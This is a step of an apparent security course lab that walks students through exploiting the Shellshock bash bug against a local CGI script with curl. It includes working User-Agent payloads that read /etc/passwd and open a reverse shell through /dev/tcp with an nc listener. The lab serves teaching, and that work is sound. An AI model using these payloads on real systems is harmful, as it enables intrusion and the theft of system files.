Lab: Shellshock curl

Step: 6

• Another utility that we need to discuss is curl
  • This is a generic tool for transferring data from a server.
  • It understands many different protocols.
  • But the one we care about is http
• First look at /usr/lib/cgi-bin/test.cgi
  • Note that this is just a bash program.
  • And that it is using the faulty shell
  • And that it does not do any input at all.
• You can run this from a browser: http://localhost/cgi-bin/test.cgi
• Curl is "a tool for transferring data from or to a server"
  • It supports many different protocols.
  • But in this case we are interested in http

•  curl http://localhost/cgi-bin/test.cgi

• curl supports many different command line flags.
  • -v invokes verbose mode.
• When the program is run, it is run in a subshell.
• Let's look a the environment of that subshell
  • nano /usr/lib/cgi-bin/test.cgi
  • Add printenv
• Fetch this web pages with both curl and the browser.
  • Note that the variable HTTP_USER_AGENT is set as an environment variable.
  • This allows you to customize your output
  • Try adding

    echo ${HTTP_USER_AGENT}
    
    echo
    if [ ${HTTP_USER_AGENT}=="curl/7.47.0" ]; then
        echo "Hello Curl User"
    else
        echo "Be cool, use curl"
    fi

• From this we can determine that when apache forks a new process to run the cgi program
  • It sets the environment variable HTTP_USER_AGENT.
• It turns out that curl lets us control the user agent
  • -A agent_string
• Try curl -v -A "Not Curl" http://localhost/cgi-bin/test.cgi
• Try curl -v http://localhost/cgi-bin/test.cgi -A "() { echo hello;}; /bin/cat /etc/passwd
• We need to add just a little to this to make remote commands work.
• We need to trick the web server into thinking it is delivering a web pages.
• To do this look at the cgi-bin script

  • echo Content-type: text/plain
    echo
    echo 
    # bash code goes here 

  • This is the form of all cgi-bin programs
• We can duplicate it with our command line
  • NOTE: These commands need to be all on one line, but I put them across several to make them more readable

  •  curl 
        -A "() { echo hello;}; 
         echo Content-type: plain/text; echo; echo; /bin/cat /etc/passwd" 
         http://localhost/cgi-bin/test.cgi

  • Can you use this, and your knowledge of the shell-shock bug to start a reverse server?
    • In one window start

      nc -l 9090 -v

    •  curl 
          -A "() { echo hello;};
          echo Content-type plain/text; echo; echo;
          /bin/bash -i > /dev/tcp/localhost/9090 0<&1 2>&1"
          http://localhost/cgi-bin/test.cgi
           

  • It the first window, you should now have a shell running as www-data